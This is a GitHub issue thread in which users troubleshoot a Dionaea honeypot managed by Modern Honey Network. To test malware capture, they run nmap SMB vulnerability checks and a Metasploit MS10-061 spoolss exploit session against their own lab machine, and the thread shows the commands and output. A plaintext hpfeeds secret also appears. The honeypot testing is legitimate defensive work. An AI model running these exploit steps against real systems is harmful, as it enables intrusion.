Open royikle opened 7 years ago
For now I tried two method but there is nothing in /var/dionaea/binaries/.
Install curl and close UFW. https://github.com/threatstream/mhn/issues/414
nmap --script smb-vuln-ms08-067.nse -p445 {ip} https://github.com/threatstream/mhn/issues/372
Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-05 16:41 CST
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:779: 'smb-vuln-ms08-067.nse' did not match a category, filename, or directory
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nse_main.lua:779: in function 'get_chosen_scripts'
/usr/bin/../share/nmap/nse_main.lua:1271: in main chunk
[C]: in ?
QUITTING!
Is there any way I can fix this?
Use nmap to check the 445 port ,it open.
PORT STATE SERVICE VERSION
21/tcp open ftp Dionaea honeypot ftpd
22/tcp open ssh (protocol 2.0)
42/tcp open tcpwrapped
135/tcp open msrpc?
445/tcp open microsoft-ds Dionaea honeypot smbd
1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server
3306/tcp open mysql MySQL 5.0.54
5060/tcp open sip (SIP end point; Status: 200 OK)
5061/tcp open ssl/sip (SIP end point; Status: 200 OK)
Firewall is down.
ubuntu@ubuntu:~$ sudo ufw status
[sudo] password for ubuntu:
Status: inactive
They are my virtual machine by using NAT. I want to solve every problem as passable as I can before I put it on-line. So we talk about location . Is that mean some attack just have log but will not catch binaries (like:nmap -sV -P0 IP)? Maybe I need to use other method to check binaries?
Try this and check whether your honeypot is really vulnerable for the smb vulnerability for ms08-067. nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}
I have had the same issue when deployed via the script in MHN. I manually installed Dionaea and then linked it to MHN for monitoring. Started catching binaries right away.
On Tue, Jun 6, 2017 at 2:12 AM -0400, "Waseem ud din" notifications@github.com wrote:
Try this and check whether your honeypot is really vulnerable for the smb vulnerability for ms08-067. nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}
— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub, or mute the thread.
How did you deploy manually and link to mhn?
On Tue, Jun 6, 2017 at 4:18 AM arnydo notifications@github.com wrote:
I have had the same issue when deployed via the script in MHN. I manually installed Dionaea and then linked it to MHN for monitoring. Started catching binaries right away.
On Tue, Jun 6, 2017 at 2:12 AM -0400, "Waseem ud din" < notifications@github.com> wrote:
Try this and check whether your honeypot is really vulnerable for the smb vulnerability for ms08-067. nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}
— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub, or mute the thread.
— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/threatstream/mhn/issues/417#issuecomment-306443614, or mute the thread https://github.com/notifications/unsubscribe-auth/AYt19tgh75gARR6VekgboZAPOOYF2PDNks5sBSdzgaJpZM4NvwhU .
-- -SmUrF3R5
I followed the install instructions from:HTTPS://github.com/dinotools/dionaea
And linked it via Hpfeeds as described at:https://github.com/threatstream/mhn/wiki/Incorporate-an-already-deployed-Honeypot-into-MHN
Hope this helps!
On Tue, Jun 6, 2017 at 10:59 AM -0400, "SmUrF3R5" notifications@github.com wrote:
How did you deploy manually and link to mhn?
On Tue, Jun 6, 2017 at 4:18 AM arnydo notifications@github.com wrote:
I have had the same issue when deployed via the script in MHN. I manually
installed Dionaea and then linked it to MHN for monitoring. Started
catching binaries right away.
On Tue, Jun 6, 2017 at 2:12 AM -0400, "Waseem ud din" <
notifications@github.com> wrote:
Try this and check whether your honeypot is really vulnerable for the smb
vulnerability for ms08-067. nmap -A
/usr/share/nmap/scripts/smb-check-vulns.nse {host}
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub, or mute the thread.
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
https://github.com/threatstream/mhn/issues/417#issuecomment-306443614,
or mute the thread
.
--
-SmUrF3R5
— You are receiving this because you commented. Reply to this email directly, view it on GitHub, or mute the thread.
Thanks for that. I am unclear as to what to put here.
PUBLISH_CHANNELS=
On Tue, Jun 6, 2017 at 9:02 AM, arnydo notifications@github.com wrote:
I followed the install instructions from:HTTPS://github.com/ dinotools/dionaea And linked it via Hpfeeds as described at:https://github.com/ threatstream/mhn/wiki/Incorporate-an-already-deployed-Honeypot-into-MHN
Hope this helps!
On Tue, Jun 6, 2017 at 10:59 AM -0400, "SmUrF3R5" < notifications@github.com> wrote:
How did you deploy manually and link to mhn?
On Tue, Jun 6, 2017 at 4:18 AM arnydo notifications@github.com wrote:
I have had the same issue when deployed via the script in MHN. I manually
installed Dionaea and then linked it to MHN for monitoring. Started
catching binaries right away.
On Tue, Jun 6, 2017 at 2:12 AM -0400, "Waseem ud din" <
notifications@github.com> wrote:
Try this and check whether your honeypot is really vulnerable for the smb
vulnerability for ms08-067. nmap -A
/usr/share/nmap/scripts/smb-check-vulns.nse {host}
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub, or mute the thread.
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
https://github.com/threatstream/mhn/issues/417#issuecomment-306443614,
or mute the thread
.
--
-SmUrF3R5
— You are receiving this because you commented. Reply to this email directly, view it on GitHub, or mute the thread.
— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/threatstream/mhn/issues/417#issuecomment-306514623, or mute the thread https://github.com/notifications/unsubscribe-auth/AYt19hc0uYuhFBuuiKrAe44nOiOy2RVHks5sBWofgaJpZM4NvwhU .
1.Try nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}
ubuntu@ubuntu:~$ nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse 10.20.1.81
Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 11:35 CST
Unable to split netmask from target expression: "/usr/share/nmap/scripts/smb-check-vulns.nse"
ubuntu@ubuntu:/usr/share/nmap/scripts$ nmap -A 10.20.1.81
Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 11:42 CST
Nmap scan report for 10.20.1.81
Host is up (0.0012s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Dionaea honeypot ftpd
.
.
.
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.36 seconds
No payloads in MHN and no file in/var/dionaea/binaries/.
2.I deploied dionaea by MHN deploy script. I don't know how to link to mhn , so I just use script to install. It will link to mhn automatically I think. Isn't it?
3.About link to hpfeed. My problem is bigger than @SmUrF3R5 . I just know IDENT is UUID from MHN. I have no ideal where can found SECRET and PUBLISH_CHANNELS. Is SECERT in dionaea.conf ?
Check the installation directory of the nmap
and findout the scripts that are related to smb
vulnerabilities.
Dionaea get the payload on 445 the nmap scanner will only for the testing of your setup to upload the malware sample you have to used tools like metasploit.
I check the path of /usr/share/nmap/scripts
.
And found out a smb-check-vulns.nse file.
So the file is here but command can't run.
Do I have any command to do the same thing?
I tried this command.
ubuntu@ubuntu:~$ nmap -A --script=smb-check-vulns.nse 10.20.1.81
The /var/dionaea/binaries/
still empty.
My command seems work.
Is smb-check-vulns.nse not a metasploit?
I'm not good at metasploit .
I can open armitage tool in Kali but not really understand every attack means.
Can someone recommend a keyword for metasploit that I can google it by myself ?
Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 15:15 CST
Nmap scan report for 10.20.1.81
Host is up (0.011s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Dionaea honeypot ftpd
22/tcp open ssh (protocol 2.0)
42/tcp open tcpwrapped
135/tcp open msrpc?
445/tcp open microsoft-ds Dionaea honeypot smbd
1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server
3306/tcp open mysql MySQL 5.0.54
5060/tcp open sip (SIP end point; Status: 200 OK)
5061/tcp open ssl/sip (SIP end point; Status: 200 OK)
.
.
.
Host script results:
| smb-check-vulns:
| MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_ MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.94 seconds
Add this argument in your --script-args=unsafe=1
nmap command like this,
nmap -A --script=smb-check-vulns.nse 1
--script-args=unsafe=1 0.20.1.81` because as per the nmap output your system looks clean that's mean your configurations are not valid.
try the command and share the output.
OK , I try the command.
nmap -A --script=smb-check-vulns.nse --script-args=unsafe=1 10.20.1.81
The /var/dionaea/binaries/ is empty.
Here is output.
It seems I can try MS08-067 threat?
Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 16:56 CST
Nmap scan report for 10.20.1.81
Host is up (0.0020s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Dionaea honeypot ftpd
22/tcp open ssh (protocol 2.0)
42/tcp open tcpwrapped
135/tcp open msrpc?
445/tcp open microsoft-ds Dionaea honeypot smbd
1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server
3306/tcp open mysql MySQL 5.0.54
5060/tcp open sip (SIP end point; Status: 200 OK)
5061/tcp open ssl/sip (SIP end point; Status: 200 OK)
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=6.40%I=7%D=6/7%Time=5937BFB4%P=x86_64-pc-linux-gnu%r(NULL,
SF:2B,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\.8\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5060-TCP:V=6.40%I=7%D=6/7%Time=5937BFC1%P=x86_64-pc-linux-gnu%r(SIP
SF:Options,10A,"SIP/2\.0\x20200\x20OK\r\nContact:\x20sip:nm2@nm2\r\nTo:\x2
SF:0sip:nm2@nm2\r\nCSeq:\x2042\x20OPTIONS\r\nAccept-Language:\x20en\r\nAcc
SF:ept:\x20application/sdp\r\nCall-ID:\x2050000\r\nVia:\x20SIP/2\.0/TCP\x2
SF:0nm;branch=foo\r\nContent-Length:\x200\r\nAllow:\x20REGISTER,\x20OPTION
SF:S,\x20INVITE,\x20CANCEL,\x20BYE,\x20ACK\r\nFrom:\x20sip:nm@nm;tag=root\
SF:r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5061-TCP:V=6.40%T=SSL%I=7%D=6/7%Time=5937BFCE%P=x86_64-pc-linux-gnu
SF:%r(SIPOptions,10A,"SIP/2\.0\x20200\x20OK\r\nContact:\x20sip:nm2@nm2\r\n
SF:To:\x20sip:nm2@nm2\r\nCSeq:\x2042\x20OPTIONS\r\nAccept-Language:\x20en\
SF:r\nAccept:\x20application/sdp\r\nCall-ID:\x2050000\r\nVia:\x20SIP/2\.0/
SF:TCP\x20nm;branch=foo\r\nContent-Length:\x200\r\nAllow:\x20REGISTER,\x20
SF:OPTIONS,\x20INVITE,\x20CANCEL,\x20BYE,\x20ACK\r\nFrom:\x20sip:nm@nm;tag
SF:=root\r\n\r\n");
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NOT VULNERABLE
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 340.23 seconds
Your configurations look fine as ms08-067 is vulnerable so use metasploit to upload the exploit on your dionaea using the following.
https://docs.google.com/document/d/1Lg5q-NL38mjbwYHYP4cGrGZ5baY4etB0-BdWPie2xVw/edit?usp=sharing
ubuntu@ubuntu:~$ msfconsole
msfconsole: command not found
So I need to install Metasploit Framework first right? I will try it tomorrow!
Sorry for yesterday , I just had something important. First use the script from google docs.
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > set LPORT 4444
LPORT => 4444
msf exploit(ms10_061_spoolss) > set PNAME XPSPrinter
PNAME => XPSPrinter
msf exploit(ms10_061_spoolss) > set LHOST 192.168.216.144
LHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > set RHOST 192.168.216.144
RHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > show options
Module options (exploit/windows/smb/ms10_061_spoolss):
Name Current Setting Required Description
---- --------------- -------- -----------
PNAME XPSPrinter no The printer share name to use on the target
RHOST 192.168.216.144 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE spoolss no The named pipe for the spooler service
Exploit target:
Id Name
-- ----
0 Windows Universal
msf exploit(ms10_061_spoolss) > exploit
[*] Started reverse TCP handler on 192.168.216.144:4444
[*] 192.168.216.144:445 - Trying target Windows Universal...
[*] 192.168.216.144:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[-] 192.168.216.144:445 - Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
Maybe it's not a good ideal to scan Dionaea by itself. I will create a new vm and try again.
I just use the other vm to try this.
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > set LPORT 4444
LPORT => 4444
msf exploit(ms10_061_spoolss) > set PNAME XPSPrinter
PNAME => XPSPrinter
msf exploit(ms10_061_spoolss) > set LHOST 192.168.216.139
LHOST => 192.168.216.139
msf exploit(ms10_061_spoolss) > set RHOST 192.168.216.144
RHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > show options
Module options (exploit/windows/smb/ms10_061_spoolss):
Name Current Setting Required Description
---- --------------- -------- -----------
PNAME XPSPrinter no The printer share name to use on the target
RHOST 192.168.216.144 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE spoolss no The named pipe for the spooler service
Exploit target:
Id Name
-- ----
0 Windows Universal
msf exploit(ms10_061_spoolss) > exploit
[*] Started reverse TCP handler on 192.168.216.139:4444
[*] 192.168.216.144:445 - Trying target Windows Universal...
[*] 192.168.216.144:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[*] 192.168.216.144:445 - Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[*] 192.168.216.144:445 - Attempting to exploit MS10-061 via \\192.168.216.144\XPSPrinter ...
[*] 192.168.216.144:445 - Printer handle: 0000000000000000000000000000000000000000
[*] 192.168.216.144:445 - Job started: 0x3
[*] 192.168.216.144:445 - Wrote 73802 bytes to %SystemRoot%\system32\eb1czUt1c1YZ0v.exe
[*] 192.168.216.144:445 - Job started: 0x3
[*] 192.168.216.144:445 - Wrote 2233 bytes to %SystemRoot%\system32\wbem\mof\mu4JkthYhxiKjN.mof
[-] 192.168.216.144:445 - Exploit failed: NoMethodError undefined method `unpack' for nil:NilClass
[*] Exploit completed, but no session was created.
msf exploit(ms10_061_spoolss) > sqlite3 /var/dionaea/logsql.sqlite
[-] Unknown command: sqlite3.
msf exploit(ms10_061_spoolss) > select * from download;
[-] Unknown command: select.
msf exploit(ms10_061_spoolss) > ls -l /var/dionaea/binaries/
[*] exec: ls -l /var/dionaea/binaries/
ls: cannot access /var/dionaea/binaries/: No such file or directory
There are two files in /var/dionaea/binaries/ . 415454e80e4ebc341928b6f5b89d251d、spoolss-2hhwq5zi.tmp
And dionaea payloads in MHN is still empty. I install this dionaea by using MHN deploy script. Is that means I have problem in dionaea connecting to MHN?
You have to run the sqlite3 commands on sensor not on metasploit, as well as the sql query on the sqlite3 console. You have to check your hpfeeds section of the dionaea configuration is it proper ?
ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from download;
Error: no such table: download
ubuntu@ubuntu:~$ ls -l /var/dionaea/binaries/
total 152
-rw------- 2 nobody nogroup 73802 Jun 8 15:14 415454e80e4ebc341928b6f5b89d251d
-rw------- 2 nobody nogroup 73802 Jun 8 15:14 spoolss-2hhwq5zi.tmp
I use script in MHN , find out dionaea's configuration.
mongo hpfeeds
> db.auth_key.find()
{ "_id" : ObjectId("59350aad1d41c805e59d6091"), "subscribe" : [ ], "secret" : "Qa8EsgaruZZezlVZ", "identifier" : "1919e7aa-49c2-11e7-b60b-000c2940d5f9", "publish" : [ "mwbinary.dionaea.sensorunique", "dionaea.capture", "dionaea.capture.anon", "dionaea.caputres", "dionaea.connections" ] }
And check dionaea.conf file in dionaea sensor /etc/dionaea.
hpfeeds = {
hp1 = {
server = "10.20.1.xx"
port = "10000"
ident = "1919e7aa-49c2-11e7-b60b-000c2940d5f9"
secret = "Qa8EsgaruZZezlVZ"
// dynip_resolve: enable to lookup the sensor ip through a webservice
dynip_resolve = "http://queryip.net/ip/"
}
}
The server is my MHN ip and ident , secret looks OK. I check the port status. MHN
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.4.6 (Ubuntu)
3000/tcp open http-proxy sslstrip
8181/tcp open tcpwrapped
10000/tcp open snet-sensor-mgmt?
Dionaea
PORT STATE SERVICE VERSION
21/tcp open ftp Dionaea honeypot ftpd
22/tcp open ssh (protocol 2.0)
42/tcp open tcpwrapped
135/tcp open msrpc?
445/tcp open microsoft-ds Dionaea honeypot smbd
1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server
3306/tcp open mysql MySQL 5.0.54
5060/tcp open sip (SIP end point; Status: 200 OK)
5061/tcp open ssl/sip (SIP end point; Status: 200 OK)
Is port 10000 also need to open in dionaea?
Use the query select * from downloads
.
Also test your mhn machine all the services are running ?
sudo supervisorctl status
, sudo supervisorctl restart all
.
No its the server port client port could be any.
OK , mhn-celery-worker is really FATAL. I try to start it now by MHN Troubleshooting Guide. So I need to do action in google doc again , right?
ubuntu@ubuntu:/var/log/mhn$ sudo supervisorctl status
geoloc RUNNING pid 2882, uptime 0:07:53
honeymap RUNNING pid 2898, uptime 0:07:51
hpfeeds-broker RUNNING pid 2867, uptime 0:07:53
mhn-celery-beat RUNNING pid 2866, uptime 0:07:53
mhn-celery-worker RUNNING pid 2984, uptime 0:00:16
mhn-collector RUNNING pid 2897, uptime 0:07:51
mhn-uwsgi RUNNING pid 2887, uptime 0:07:52
mnemosyne RUNNING pid 2875, uptime 0:07:53
And very sorry , I don't really know how to query select * from downloads. Is the script like this?
sqlite> query select * from downloads.
...> ls -l /var/dionaea/binaries/
...>
why do you want dionaea what is your purpose ? And don't write query before select and put ; at the end.
mhn-celery-worker
was fatal before restart ?
Yes , mhn-celery-worker was fatal before restart.
I will put dionaea online before that I need to know what will happen as possible as I can. And I need answer other co-workers every question about MHN , even it's just a part of sensor. For this case , I want to know how dionaea payloads work and what information will output.
You have payload on the mhn dashboard now ? ok.
No there is nothing on payloads page. It's really odd. I will try to reinstall MHN and dionaea. Maybe it's some many change for them and something had bad effect. I had a time stamp problem before and the final solution is MHN had something broken. Reinstall MHN and do the same thing . The problem fix. #405 So I hope this time is the same situation.
After reinstall:
ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from download;
Error: no such table: download
I have no idea about it . Can someone let me know what the information looks like in dionaea.capture page? I can't create it by myself , so I want to know what will be there at least. Or someone still have solution to teach me?
First of all the table is downloads not download, Try to upload the malware samples again from metasploit every service should be running. The download page of mhn just show the hashes.
ubuntu@ubuntu:~$ sudo supervisorctl status
[sudo] password for ubuntu:
geoloc RUNNING pid 1494, uptime 3:22:18
honeymap RUNNING pid 1506, uptime 3:22:18
hpfeeds-broker RUNNING pid 1492, uptime 3:22:18
mhn-celery-beat RUNNING pid 1491, uptime 3:22:18
mhn-celery-worker RUNNING pid 1498, uptime 3:22:18
mhn-collector RUNNING pid 1499, uptime 3:22:18
mhn-uwsgi RUNNING pid 1495, uptime 3:22:18
mnemosyne RUNNING pid 1493, uptime 3:22:18
msf exploit(ms10_061_spoolss) > exploit
[] Started reverse TCP handler on 192.168.216.139:4444 [] 10.20.1.xx:445 - Trying target Windows Universal... [] 10.20.1.xx:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.20.1.xx[\spoolss] ... [] 10.20.1.xx:445 - Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.20.1.xx[\spoolss] ... [] 10.20.1.xx:445 - Attempting to exploit MS10-061 via \10.20.1.xx\XPSPrinter ... [] 10.20.1.xx:445 - Printer handle: 0000000000000000000000000000000000000000 [] 10.20.1.xx:445 - Job started: 0x3 [] 10.20.1.xx:445 - Wrote 73802 bytes to %SystemRoot%\system32\25sOBX2ew81reE.exe [] 10.20.1.xx:445 - Job started: 0x3 [] 10.20.1.xx:445 - Wrote 2241 bytes to %SystemRoot%\system32\wbem\mof\Pd0IItuyiKmnp6.mof [-] 10.20.1.xx:445 - Exploit failed: NoMethodError undefined method `unpack' for nil:NilClass [*] Exploit completed, but no session was created.
3. File in /var/dionaea/binaries/
4. Use the SQLite .
The script in here always confuse me .
I think my script here may be incorrect again?
I just show them but so nothing.
ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite SQLite version 3.8.2 2013-12-06 14:53:30 Enter ".help" for instructions Enter SQL statements terminated with a ";" sqlite> select * from downloads; 1|1|spoolss://::ffff:10.20.1.87|cefe8ca77a7fd5335f497446fe26bb58 2|2|spoolss://::ffff:10.20.1.87|1748bf1d4633c8cfec746e207b725bb4 sqlite> ls -l /var/dionaea/binaries/ ...>
5. Attack page have log but dionaea.capture in payloads get nothing.
Brother in sqlite you have to just run the sql queries and ls -l /var/dionaea/binaries/
is the command of the linux.
Sorry bro , I'm really not good at sql. Can you teach me how to do sql queries? I just got here and I don't know what's next.
ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from downloads;
1|1|spoolss://::ffff:10.20.1.87|cefe8ca77a7fd5335f497446fe26bb58
2|2|spoolss://::ffff:10.20.1.87|1748bf1d4633c8cfec746e207b725bb4
I had send the mail. Really thanks for your help.
Did you ever get the uploads showing on the payloads page? How did you resolve the issue? I have a Dionaea instance that is catching malware, my hpfeed is sending data to MHN, but there is nothing showing up in payloads. Thanks!
I could see file in /var/dionaea/binaries/ and connection between mhn , dionaea is no problem, All service is running. But after I upload metasploit, the payloads shows nothing. Is your situation like me?
I did actually get it working. I updated curl to ver 7.50 and installed MHN as root. Everything is working great now
I wrote up what I did in a blog post found here: https://www.attacusatlas.com/how-to-set-up-dionaea-honeypot-with-modern-honey-network-and-slack-alerts/
Hope it helps!
Thanks!! I will check the blog and try again.
You install MHN use sudo as root, this is what I do. So maybe the different is curl version , I will check it.
I just wanted to say that the article @JBAnderson wrote is excellent. I already had an MHN install working, along with one sensor that was reporting attacks. All with Splunk integration too. But wasn't capturing malware binaries like most users.
After reading @JBAnderson 's article I now have a sensor running and capturing malware. It took about 30 mins before I captured the wanna_cry ransomeware. Kudos @JBAnderson for the hard work!
So everyone can use the mhn payloads to show malware information now , except me. I also follow @JBAnderson blog part 1,2 and use ms10_061_spoolss to test. It's nothing change. I can get attack log in my mhn but payload still nothing. Binaries folder have spoolss file and all service is up.
Should I try to install splunk or elk ? Is it related to mhn payloads page?
@royikle ELK and splunk are unrelated to your issue.
The most likely place to look I think is where you set up the HPFeeds user. The publish channels need to be exactly:
"dionaea.connections,dionaea.capture,mwbinary.dionaea.sensorunique,dionaea.caputres,dionaea.capture.anon"
(even though it looks like there's a typo in one of them)
It sounds like you are getting the "dionaea.connections" messages but not the others.
Lemme know!
Thanks for your answer @JBAnderson .
I check my mhn hpfeeds .
It seems good.
Is the virtual box network set in bridge affect it?
> db.auth_key.find({identifier: "7c5709e2-769f-11e7-a4de-08002786e5ea"}) { "_id" : ObjectId("59804ff531eddd0543c86aa5"), "subscribe" : [ ], "secret" : "FFffF*************", "identifier" : "7c5709e2-769f-11e7-a4de-***********", "publish" : [ "dionaea.connections", "dionaea.capture", "mwbinary.dionaea.sensorunique", "dionaea.caputres", "dionaea.capture.anon" ] }
I have MHN with Dionaea run for a week before start to see payload capture. Not sure if nmap script or metasploit really send malicious file to 445 (SMB). If they just exploit and send payload to memory, I don't think Dionaea can capture it.
Nmap is no payloads, it just scan dionaea. But use ms10_061_spoolss to exploit dionaea, we can check payload file in Binaries folder. If they just send payload to memory , the file will disappear after restart vm. So I think spoolss should be capture but problem is why can I show message in MHN.
@JBAnderson, Great advice on Dionaea setup. I add another sensor from your instruction and not I got Wannacry sample :D
@suwitcham, Is the sample show on MHN payloads page? Or show in Dionaea Binaries folder? If you can show on MHN , I am the only one can't show on payloads.
It show on both MHN payload for dionaea and under binary folder of dionaea itself.
Everybody follow @JBAnderson 's article and only me can't show. It's seems MHN & dionaea setting is good. Is that means maybe the problem is VM setting ,Firewall ? But it just send a log to MHN is that possible to be block?
Let take into two separate issue. Dionaea itself also work as standalone. If you can see anything on Dionaea log, it should be something wrong by itself.
I can see malicious file(spoolss) in Binaries folder. And I can see attck log in dionaea. So I think dioneae is work.
@royikle try the following from the troubleshooting wiki:
out of the box, mnemosyne filters out attacks coming from rfc1918 addresses so, you need to configure it not to do so. Here are the steps:
As root, run these commands.
cd /opt/mnemosyne/ git fetch origin git stash git merge origin/master git stash pop Now, edit mnemosyne.cfg and append this to the end of the file.
[normalizer] ignore_rfc1918 = False Lastly, run this command:
supervisorctl restart mnemosyne Then run.
supervisorctl status You should see something like this:
geoloc RUNNING pid 16719, uptime 1:25:31 honeymap RUNNING pid 17223, uptime 0:30:29 hpfeeds-broker RUNNING pid 980, uptime 10 days, 5:19:51 mhn-celery-beat RUNNING pid 961, uptime 10 days, 5:19:51 mhn-celery-worker RUNNING pid 14878, uptime 3:44:43 mhn-uwsgi RUNNING pid 9580, uptime 9 days, 3:46:32 mnemosyne RUNNING pid 17749, uptime 0:05:26
Hi all
I'm testing the dionaea sensor. MHN is a very nice tools ,It's easy to install dionaea. I use nmap to scan my dionaea , I can get event in MHN Attacks page.
But here is a question , The payloads page with dionaea.capture are not displayed log. Review the past issue , I think the point is nothing in /var/dionaea/binaries/. How can I create something in binaries folder?